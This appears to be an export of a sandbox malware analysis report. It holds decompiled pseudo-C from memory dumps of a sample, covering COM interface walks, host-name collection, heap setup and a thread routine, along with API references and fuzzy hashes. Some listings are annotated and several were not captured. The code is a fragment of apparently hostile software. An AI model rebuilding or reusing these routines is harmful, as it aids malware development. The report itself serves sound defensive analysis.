                            0x006d2613
                            0x006d261e
                            0x006d261e
                            0x006d262a

                            APIs
                              • Part of subcall function 006D7A71: RtlAllocateHeap.NTDLL(00000000,00000000,006D4DB1), ref: 006D7A7D
                            • memcpy.NTDLL(00000000,00000110,?,?,?,?,?,?,?,006D654A,?), ref: 006D258A
                            • memset.NTDLL ref: 006D25FF
                            • memset.NTDLL ref: 006D2613
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: memset$AllocateHeapmemcpy
                            • String ID:
                            • API String ID: 1529149438-0
                            • Opcode ID: c8607349459e04db9f99677a2dfd980e362edf1f4824d09f109afc5bdd104cf6
                            • Instruction ID: 6f7e3d4fa816adf39e2f869c70fbecadf20ee17a26f40ca5199326e68c6908e0
                            • Opcode Fuzzy Hash: c8607349459e04db9f99677a2dfd980e362edf1f4824d09f109afc5bdd104cf6
                            • Instruction Fuzzy Hash: FC214175D00219BBDB51AFA5CC51FEE7BBAAF15740F04402AF904EA351E734DA00CBA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 38%
                            			E006D58F8(intOrPtr _a4) {
                            				void* _v12;
                            				char _v16;
                            				void* _v20;
                            				void* _v24;
                            				void* _v28;
                            				char _v32;
                            				intOrPtr _v40;
                            				void* _v46;
                            				short _v48;
                            				intOrPtr _t49;
                            				void* _t51;
                            				intOrPtr* _t53;
                            				intOrPtr _t56;
                            				void* _t58;
                            				intOrPtr* _t59;
                            				intOrPtr* _t61;
                            				intOrPtr* _t63;
                            				intOrPtr* _t65;
                            				intOrPtr* _t67;
                            				intOrPtr* _t69;
                            				intOrPtr* _t71;
                            				short _t73;
                            				intOrPtr* _t74;
                            				intOrPtr _t77;
                            				intOrPtr* _t80;
                            				intOrPtr _t82;
                            				char* _t98;
                            				intOrPtr _t100;
                            				void* _t106;
                            				void* _t108;
                            				intOrPtr _t112;
                            
                            				_v48 = 0;
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosw");
                            				_t49 =  *0x6da348; // 0xdcd5a8
                            				_t4 = _t49 + 0x6db448; // 0x14a89f0
                            				_t82 = 0;
                            				_t5 = _t49 + 0x6db438; // 0x9ba05972
                            				_t51 =  *0x6da170(_t5, 0, 4, _t4,  &_v20); // executed
                            				_t106 = _t51;
                            				if(_t106 >= 0) {
                            					_t53 = _v20;
                            					_push( &_v12);
                            					_push(1);
                            					_push( &_v32);
                            					_push(8);
                            					_t98 =  &_v48;
                            					_push(_t98);
                            					_push(_t98);
                            					_push(_t53); // executed
                            					if( *((intOrPtr*)( *_t53 + 0x3c))() == 0) {
                            						_t56 =  *0x6da348; // 0xdcd5a8
                            						_t30 = _t56 + 0x6db428; // 0x14a89d0
                            						_t31 = _t56 + 0x6db458; // 0x4c96be40
                            						_t58 =  *0x6da10c(_v12, _t31, _t30,  &_v24); // executed
                            						_t106 = _t58;
                            						_t59 = _v12;
                            						 *((intOrPtr*)( *_t59 + 8))(_t59);
                            						goto L11;
                            					} else {
                            						_t71 = _v20;
                            						_v16 = 0;
                            						_t106 =  *((intOrPtr*)( *_t71 + 0x1c))(_t71,  &_v16);
                            						if(_t106 >= 0) {
                            							_t112 = _v16;
                            							if(_t112 == 0) {
                            								_t106 = 0x80004005;
                            								goto L11;
                            							} else {
                            								if(_t112 <= 0) {
                            									L11:
                            									if(_t106 >= 0) {
                            										goto L12;
                            									}
                            								} else {
                            									do {
                            										_t73 = 3;
                            										_v48 = _t73;
                            										_t74 = _v20;
                            										_v40 = _t82;
                            										_t108 = _t108 - 0x10;
                            										asm("movsd");
                            										asm("movsd");
                            										asm("movsd");
                            										asm("movsd");
                            										_t106 =  *((intOrPtr*)( *_t74 + 0x20))(_t74,  &_v12);
                            										if(_t106 < 0) {
                            											goto L7;
                            										} else {
                            											_t77 =  *0x6da348; // 0xdcd5a8
                            											_t23 = _t77 + 0x6db428; // 0x14a89d0
                            											_t24 = _t77 + 0x6db458; // 0x4c96be40
                            											_t106 =  *0x6da10c(_v12, _t24, _t23,  &_v24);
                            											_t80 = _v12;
                            											 *((intOrPtr*)( *_t80 + 8))(_t80);
                            											if(_t106 >= 0) {
                            												L12:
                            												_t63 = _v24;
                            												_t106 =  *((intOrPtr*)( *_t63 + 0x3c))(_t63,  &_v28);
                            												if(_t106 >= 0) {
                            													_t100 =  *0x6da348; // 0xdcd5a8
                            													_t67 = _v28;
                            													_t40 = _t100 + 0x6db418; // 0x214e3
                            													_t106 =  *((intOrPtr*)( *_t67))(_t67, _t40, _a4);
                            													_t69 = _v28;
                            													 *((intOrPtr*)( *_t69 + 8))(_t69);
                            												}
                            												_t65 = _v24;
                            												 *((intOrPtr*)( *_t65 + 8))(_t65);
                            											} else {
                            												goto L7;
                            											}
                            										}
                            										goto L15;
                            										L7:
                            										_t82 = _t82 + 1;
                            									} while (_t82 < _v16);
                            									goto L11;
                            								}
                            							}
                            						}
                            					}
                            					L15:
                            					_t61 = _v20;
                            					 *((intOrPtr*)( *_t61 + 8))(_t61);
                            				}
                            				return _t106;
                            			}
                            0x006d5903
                            0x006d590a
                            0x006d590b
                            0x006d590c
                            0x006d590d
                            0x006d5913
                            0x006d5918
                            0x006d5921
                            0x006d5924
                            0x006d592b
                            0x006d5931
                            0x006d5935
                            0x006d593b
                            0x006d5943
                            0x006d5944
                            0x006d5949
                            0x006d594a
                            0x006d594c
                            0x006d594f
                            0x006d5950
                            0x006d5951
                            0x006d5957
                            0x006d59ed
                            0x006d59f2
                            0x006d59f9
                            0x006d5a03
                            0x006d5a09
                            0x006d5a0b
                            0x006d5a11
                            0x00000000
                            0x006d595d
                            0x006d595d
                            0x006d5964
                            0x006d596d
                            0x006d5971
                            0x006d5977
                            0x006d597a
                            0x006d59e2
                            0x00000000
                            0x006d597c
                            0x006d597c
                            0x006d5a14
                            0x006d5a16
                            0x00000000
                            0x00000000
                            0x006d5982
                            0x006d5982
                            0x006d5984
                            0x006d5989
                            0x006d598d
                            0x006d5990
                            0x006d5995
                            0x006d599d
                            0x006d599e
                            0x006d599f
                            0x006d59a1
                            0x006d59a5
                            0x006d59a9
                            0x00000000
                            0x006d59ab
                            0x006d59af
                            0x006d59b4
                            0x006d59bb
                            0x006d59cb
                            0x006d59cd
                            0x006d59d3
                            0x006d59d8
                            0x006d5a18
                            0x006d5a18
                            0x006d5a25
                            0x006d5a29
                            0x006d5a2e
                            0x006d5a34
                            0x006d5a39
                            0x006d5a43
                            0x006d5a45
                            0x006d5a4b
                            0x006d5a4b
                            0x006d5a4e
                            0x006d5a54
                            0x00000000
                            0x00000000
                            0x00000000
                            0x006d59d8
                            0x00000000
                            0x006d59da
                            0x006d59da
                            0x006d59db
                            0x00000000
                            0x006d59e0
                            0x006d597c
                            0x006d597a
                            0x006d5971
                            0x006d5a57
                            0x006d5a57
                            0x006d5a5d
                            0x006d5a5d
                            0x006d5a66

                            APIs
                            • IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,014A89D0,006D5E9D,?,?,?,?,?,?,?,?,?,?,?,006D5E9D), ref: 006D59C5
                            • IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,014A89D0,006D5E9D,?,?,?,?,?,?,?,006D5E9D,00000000,00000000,00000000,006D0063), ref: 006D5A03
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: QueryServiceUnknown_
                            • String ID:
                            • API String ID: 2042360610-0
                            • Opcode ID: 0faf5a50f2ebdfd4a482953f67cb556db42497e50b88b5846fb331e9e3d1d56c
                            • Instruction ID: 9ef0a8896d9d8f2abd534a4427541e099190619bd7194c9ac805da195429bdb5
                            • Opcode Fuzzy Hash: 0faf5a50f2ebdfd4a482953f67cb556db42497e50b88b5846fb331e9e3d1d56c
                            • Instruction Fuzzy Hash: D9512A75D00619EFCB40CFE8C888DAEB7BAFF48710B05459AE906EB354D731A945CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 75%
                            			E006D4BD5(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                            				void* _v8;
                            				void* __esi;
                            				intOrPtr* _t35;
                            				void* _t40;
                            				intOrPtr* _t41;
                            				intOrPtr* _t43;
                            				intOrPtr* _t45;
                            				intOrPtr* _t50;
                            				intOrPtr* _t52;
                            				void* _t54;
                            				intOrPtr* _t55;
                            				intOrPtr* _t57;
                            				intOrPtr* _t61;
                            				intOrPtr* _t65;
                            				intOrPtr _t68;
                            				void* _t72;
                            				void* _t75;
                            				void* _t76;
                            
                            				_t55 = _a4;
                            				_t35 =  *((intOrPtr*)(_t55 + 4));
                            				_a4 = 0;
                            				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
                            				if(_t76 < 0) {
                            					L18:
                            					return _t76;
                            				}
                            				_t40 = E006D2689(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
                            				_t76 = _t40;
                            				if(_t76 >= 0) {
                            					_t61 = _a28;
                            					if(_t61 != 0 &&  *_t61 != 0) {
                            						_t52 = _v8;
                            						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
                            					}
                            					if(_t76 >= 0) {
                            						_t43 =  *_t55;
                            						_t68 =  *0x6da348; // 0xdcd5a8
                            						_t20 = _t68 + 0x6db1fc; // 0x740053
                            						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
                            						if(_t76 >= 0) {
                            							_t76 = E006D1061(_a4);
                            							if(_t76 >= 0) {
                            								_t65 = _a28;
                            								if(_t65 != 0 &&  *_t65 == 0) {
                            									_t50 = _a4;
                            									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
                            								}
                            							}
                            						}
                            						_t45 = _a4;
                            						if(_t45 != 0) {
                            							 *((intOrPtr*)( *_t45 + 8))(_t45);
                            						}
                            						_t57 = __imp__#6;
                            						if(_a20 != 0) {
                            							 *_t57(_a20);
                            						}
                            						if(_a12 != 0) {
                            							 *_t57(_a12);
                            						}
                            					}
                            				}
                            				_t41 = _v8;
                            				 *((intOrPtr*)( *_t41 + 8))(_t41);
                            				goto L18;
                            			}
                            0x006d4bdb
                            0x006d4bde
                            0x006d4bee
                            0x006d4bf7
                            0x006d4bfb
                            0x006d4cc9
                            0x006d4ccf
                            0x006d4ccf
                            0x006d4c15
                            0x006d4c1a
                            0x006d4c1e
                            0x006d4c24
                            0x006d4c29
                            0x006d4c30
                            0x006d4c3f
                            0x006d4c3f
                            0x006d4c43
                            0x006d4c45
                            0x006d4c51
                            0x006d4c5c
                            0x006d4c67
                            0x006d4c6b
                            0x006d4c75
                            0x006d4c79
                            0x006d4c7b
                            0x006d4c80
                            0x006d4c87
                            0x006d4c97
                            0x006d4c97
                            0x006d4c80
                            0x006d4c79
                            0x006d4c99
                            0x006d4c9e
                            0x006d4ca3
                            0x006d4ca3
                            0x006d4ca6
                            0x006d4caf
                            0x006d4cb4
                            0x006d4cb4
                            0x006d4cb9
                            0x006d4cbe
                            0x006d4cbe
                            0x006d4cb9
                            0x006d4c43
                            0x006d4cc0
                            0x006d4cc6
                            0x00000000

                            APIs
                              • Part of subcall function 006D2689: SysAllocString.OLEAUT32(80000002), ref: 006D26E6
                              • Part of subcall function 006D2689: SysFreeString.OLEAUT32(00000000), ref: 006D274C
                            • SysFreeString.OLEAUT32(?), ref: 006D4CB4
                            • SysFreeString.OLEAUT32(006D23DF), ref: 006D4CBE
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: String$Free$Alloc
                            • String ID:
                            • API String ID: 986138563-0
                            • Opcode ID: dd5718fd7e42880ee3f05bdfb8cf7e96861ee2fba4ff264a240a30457a13d607
                            • Instruction ID: b952ea37cf0a8f505018780fbe6f872032012f8a1eb5c4a70978401fb957de9f
                            • Opcode Fuzzy Hash: dd5718fd7e42880ee3f05bdfb8cf7e96861ee2fba4ff264a240a30457a13d607
                            • Instruction Fuzzy Hash: 21310872910119EFCB11DFA5D888C9BBB7AFFC97407154A5AF8059B310DA32AD91CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 50%
                            			// COM interface walk. With obj = __eax: obj->vtbl[0x3c/4] is called with 0 and &_v16 and
                            			// yields a first interface; QueryInterface (vtbl[0]) on it with the IID at *0x6da348+0x6db488
                            			// yields _v12; _v12->vtbl[0x1c/4](_v12, &_v8) yields _v8; a second QueryInterface with the IID
                            			// at *0x6da348+0x6db478 stores the requested interface in _a4. The two RPCRT4 hits listed
                            			// below are these QueryInterface calls going through a proxy. Every intermediate interface is
                            			// released on the way out (vtbl offset 8 == IUnknown::Release); _t51 carries the last HRESULT.
                            			E006D5A69(intOrPtr* __eax, intOrPtr _a4) {
                            				void* _v8;
                            				void* _v12;
                            				void* _v16;
                            				intOrPtr* _t22;
                            				void* _t23;
                            				intOrPtr* _t24;
                            				intOrPtr* _t26;
                            				intOrPtr* _t28;
                            				intOrPtr* _t30;
                            				void* _t31;
                            				intOrPtr* _t32;
                            				intOrPtr _t42;
                            				intOrPtr _t45;
                            				intOrPtr _t48;
                            				void* _t51;
                            
                            				_push( &_v16);
                            				_t42 =  *0x6da348; // 0xdcd5a8
                            				_t2 = _t42 + 0x6db468; // 0x20400
                            				_push(0);
                            				_push(__eax);
                            				_t51 =  *((intOrPtr*)( *__eax + 0x3c))(); // obj->vtbl[15](obj, 0, &_v16)
                            				if(_t51 >= 0) {
                            					_t22 = _v16;
                            					_t45 =  *0x6da348; // 0xdcd5a8
                            					_t6 = _t45 + 0x6db488; // 0xe7a1af80 (first dword of the IID)
                            					_t23 =  *((intOrPtr*)( *_t22))(_t22, _t6,  &_v12); // executed  -- QueryInterface(this, riid, &_v12)
                            					_t51 = _t23;
                            					if(_t51 >= 0) {
                            						_t26 = _v12;
                            						_t51 =  *((intOrPtr*)( *_t26 + 0x1c))(_t26,  &_v8); // vtbl[7](this, &_v8)
                            						if(_t51 >= 0) {
                            							_t48 =  *0x6da348; // 0xdcd5a8
                            							_t30 = _v8;
                            							_t12 = _t48 + 0x6db478; // 0xa4c6892c (first dword of the IID)
                            							_t31 =  *((intOrPtr*)( *_t30))(_t30, _t12, _a4); // executed  -- QueryInterface(this, riid, ppv = _a4)
                            							_t51 = _t31;
                            							_t32 = _v8;
                            							 *((intOrPtr*)( *_t32 + 8))(_t32); // Release
                            						}
                            						_t28 = _v12;
                            						 *((intOrPtr*)( *_t28 + 8))(_t28); // Release
                            					}
                            					_t24 = _v16;
                            					 *((intOrPtr*)( *_t24 + 8))(_t24); // Release
                            				}
                            				return _t51;
                            			}

                            Disassembly listing (address column only, instruction text not captured in this export): 0x006d5a75 to 0x006d5afa

                            APIs
                            • IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 006D5AA6
                            • IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 006D5AD7
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: Interface_ProxyQueryUnknown_
                            • String ID:
                            • API String ID: 2522245112-0
                            • Opcode ID: 5422448290fac1f5a530b48a100318333bb395d81e9eb3398d3e99fafe91c8ae
                            • Instruction ID: 33a018ca652419e1bc2b48ad6b716fa2fb4d5e6342223734e9dd4b96dffbed79
                            • Opcode Fuzzy Hash: 5422448290fac1f5a530b48a100318333bb395d81e9eb3398d3e99fafe91c8ae
                            • Instruction Fuzzy Hash: DB214F75E00619EFCB00CBA4C888D9AB77AEF88704B158689E906DB365D771ED41CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			// Thread routine in the main module (image base 0x400000); it never returns, it ends in
                            			// ExitThread(_t25). It selects one of two string offsets from the global at 0x403184 depending
                            			// on whether *0x40316c > 5, hands it to E00401329, zeroes the 24-byte _v32 and asks E00401920
                            			// to fill it using the value *0x403180 ^ 0xf7a71548; failure gives exit code 0xb. Otherwise a
                            			// buffer of 2*lstrlenW(*0x403178)+10 bytes comes from E00401A49, its first dword is set to 0
                            			// and the wide string from *0x403178 is copied to offset 4 (E00401FBA), or an empty wide
                            			// string is written there; the exit code is then E00401875(_v28). _t40 and _t45 are register
                            			// temporaries the decompiler left undeclared.
                            			E004011F6() {
                            				char _v16;
                            				intOrPtr _v28;
                            				void _v32;
                            				void* _v36;
                            				intOrPtr _t15;
                            				void* _t16;
                            				long _t25;
                            				int _t26;
                            				void* _t30;
                            				intOrPtr* _t32;
                            				signed int _t36;
                            				intOrPtr _t39;
                            
                            				_t15 =  *0x403184;
                            				if( *0x40316c > 5) {
                            					_t16 = _t15 + 0x4040f9;
                            				} else {
                            					_t16 = _t15 + 0x4040b1;
                            				}
                            				E00401329(_t16, _t16);
                            				_t36 = 6;
                            				memset( &_v32, 0, _t36 << 2); // 24 bytes
                            				if(E00401920( &_v32,  &_v16,  *0x403180 ^ 0xf7a71548) == 0) {
                            					_t25 = 0xb;
                            				} else {
                            					_t26 = lstrlenW( *0x403178);
                            					_t8 = _t26 + 2; // 0x2
                            					_t11 = _t26 + _t8 + 8; // 0xa  -- 2*len + 10 bytes
                            					_t30 = E00401A49(_t39, _t11,  &_v32,  &_v36); // executed
                            					if(_t30 == 0) {
                            						_t40 =  *0x403178;
                            						_t32 = _v36;
                            						 *_t32 = 0;
                            						if( *0x403178 == 0) {
                            							 *((short*)(_t32 + 4)) = 0; // empty wide string at offset 4
                            						} else {
                            							E00401FBA(_t45, _t40, _t32 + 4); // copy wide string to offset 4
                            						}
                            					}
                            					_t25 = E00401875(_v28); // executed
                            				}
                            				ExitThread(_t25);
                            			}

                            Disassembly listing (address column only, instruction text not captured in this export): 0x004011fc to 0x004012a9

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.505462084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.505438679.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.505483863.0000000000402000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.505504174.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.505525978.0000000000406000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_main.jbxd
                            Similarity
                            • API ID: ExitThreadlstrlen
                            • String ID:
                            • API String ID: 2636182767-0
                            • Opcode ID: 790b61abaedcbdc4a60141dd56dd6f5efea9b863add848607eda0236650ecbbf
                            • Instruction ID: b06575ce47738e750fa21101d439a179049e3a3f6f5bd6bf59ccf56b07c94354
                            • Opcode Fuzzy Hash: 790b61abaedcbdc4a60141dd56dd6f5efea9b863add848607eda0236650ecbbf
                            • Instruction Fuzzy Hash: B211AC71504205ABE701DBA5DD09E9777ECAB48304F05497BB601F71B0EB38E6098B59
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • SafeArrayCreate.OLEAUT32(00000011,00000001,80000002), ref: 006D7043
                              • Part of subcall function 006D4BD5: SysFreeString.OLEAUT32(?), ref: 006D4CB4
                            • SafeArrayDestroy.OLEAUT32(?), ref: 006D7093
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: ArraySafe$CreateDestroyFreeString
                            • String ID:
                            • API String ID: 3098518882-0
                            • Opcode ID: 6f5cce7dab91d90856763fa63a2f3184492efba08ada609e2685af238b09a077
                            • Instruction ID: ed7ddc584870d3c080f7f8e574d19341f443d035d53739d9908942cbac017856
                            • Opcode Fuzzy Hash: 6f5cce7dab91d90856763fa63a2f3184492efba08ada609e2685af238b09a077
                            • Instruction Fuzzy Hash: 68115276D00109BFDB01DFA4DC05EEEBBBAEF44310F048056FA05E7261E7719A158BA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • SysAllocString.OLEAUT32(006D1629), ref: 006D5B63
                              • Part of subcall function 006D4BD5: SysFreeString.OLEAUT32(?), ref: 006D4CB4
                            • SysFreeString.OLEAUT32(00000000), ref: 006D5BA4
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: String$Free$Alloc
                            • String ID:
                            • API String ID: 986138563-0
                            • Opcode ID: a9464513263b9f74a25acf4b36a43866c0c91aba30824201772244a351de98f8
                            • Instruction ID: 035a9566b301fc10a3f90efb30368ca029c41a0c2c4c104473e7282ad297bf7b
                            • Opcode Fuzzy Hash: a9464513263b9f74a25acf4b36a43866c0c91aba30824201772244a351de98f8
                            • Instruction Fuzzy Hash: 70014F36901109BFCB419FA8DC04DAF7BBAEF88710B014067F906E7260E7709915DBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 37%
                            			// Returns a heap-allocated copy of the local machine's fully qualified DNS name, or NULL.
                            			// __imp__ is GetComputerNameExA (see APIs below); NameType 3 is ComputerNameDnsFullyQualified.
                            			// Classic two-call pattern: the first call with a NULL buffer leaves the required size in
                            			// _v8, E006D7A71 (RtlAllocateHeap wrapper) allocates size+1, the second call fills the buffer
                            			// and the string is NUL-terminated at the length written back into _v8. If the second call
                            			// fails the buffer is freed through E006D789E (RtlFreeHeap wrapper) and NULL is returned.
                            			E006D3DE0(void* __ecx) {
                            				signed int _v8;
                            				void* _t15;
                            				void* _t19;
                            				void* _t20;
                            				void* _t22;
                            				intOrPtr* _t23;
                            
                            				_t23 = __imp__; // GetComputerNameExA
                            				_t20 = 0;
                            				_v8 = _v8 & 0;
                            				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed  -- size query, buffer NULL
                            				_t10 = _v8;
                            				if(_v8 != 0) {
                            					_t20 = E006D7A71(_t10 + 1); // size + 1 for the terminator
                            					if(_t20 != 0) {
                            						_t15 =  *_t23(3, _t20,  &_v8); // executed  -- fill the buffer
                            						if(_t15 != 0) {
                            							 *((char*)(_v8 + _t20)) = 0; // NUL-terminate at the returned length
                            						} else {
                            							E006D789E(_t20);
                            							_t20 = 0;
                            						}
                            					}
                            				}
                            				return _t20;
                            			}

                            Disassembly listing (address column only, instruction text not captured in this export): 0x006d3de5 to 0x006d3e31

                            APIs
                            • GetComputerNameExA.KERNELBASE(00000003,00000000,006D3730,00000000,00000000,?,7491C740,006D3730), ref: 006D3DF8
                              • Part of subcall function 006D7A71: RtlAllocateHeap.NTDLL(00000000,00000000,006D4DB1), ref: 006D7A7D
                            • GetComputerNameExA.KERNELBASE(00000003,00000000,006D3730,006D3731,?,7491C740,006D3730), ref: 006D3E15
                              • Part of subcall function 006D789E: RtlFreeHeap.NTDLL(00000000,00000000,006D4E3E,00000000,?,00000000,00000000), ref: 006D78AA
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: ComputerHeapName$AllocateFree
                            • String ID:
                            • API String ID: 187446995-0
                            • Opcode ID: 2568842082b43460900db0bb8f33bef2f6ef6425a8dd21394d8ba044d73f4e18
                            • Instruction ID: e4f71ed6a05cfe5d2824188f3d0b4b8a1c2e96baf3829c8b305b02fc3c3704f7
                            • Opcode Fuzzy Hash: 2568842082b43460900db0bb8f33bef2f6ef6425a8dd21394d8ba044d73f4e18
                            • Instruction Fuzzy Hash: 02F0542AE00116BAEB21D6A9DD05FAF77EEDBC5750F25006BA900D7380EA70DF019671
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			// Runtime initialisation. Creates a growable private heap (initial size 0x400000, no maximum)
                            			// and stores its handle at 0x6da2d8, the same handle E006D1FB6 passes to RtlAllocateHeap;
                            			// returns 8 (ERROR_NOT_ENOUGH_MEMORY) if HeapCreate fails. Records GetTickCount() at
                            			// 0x6da1c8, then runs E006D2D54 and, only if that returned 0, E006D2CEC with _a4. When both
                            			// succeed, a non-zero result from E006D534A sets the flag at 0x6da300 and E006D10AD is entered.
                            			E006D72C0(signed int __edx, intOrPtr _a4) {
                            				void* _t3;
                            				void* _t5;
                            				void* _t7;
                            				void* _t8;
                            				void* _t9;
                            				signed int _t10;
                            
                            				_t10 = __edx;
                            				_t3 = HeapCreate(0, 0x400000, 0); // executed  -- 4 MiB initial, growable
                            				 *0x6da2d8 = _t3;
                            				if(_t3 == 0) {
                            					_t8 = 8; // ERROR_NOT_ENOUGH_MEMORY
                            					return _t8;
                            				}
                            				 *0x6da1c8 = GetTickCount();
                            				_t5 = E006D2D54(_a4);
                            				if(_t5 == 0) {
                            					_t5 = E006D2CEC(_t9, _a4); // executed
                            					if(_t5 == 0) {
                            						if(E006D534A(_t9) != 0) {
                            							 *0x6da300 = 1; // executed
                            						}
                            						_t7 = E006D10AD(_t10); // executed
                            						return _t7;
                            					}
                            				}
                            				return _t5;
                            			}

                            Disassembly listing (address column only, instruction text not captured in this export): 0x006d72c0 to 0x006d731a

                            APIs
                            • HeapCreate.KERNELBASE(00000000,00400000,00000000,006D3930,?), ref: 006D72C9
                            • GetTickCount.KERNEL32 ref: 006D72DD
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmp
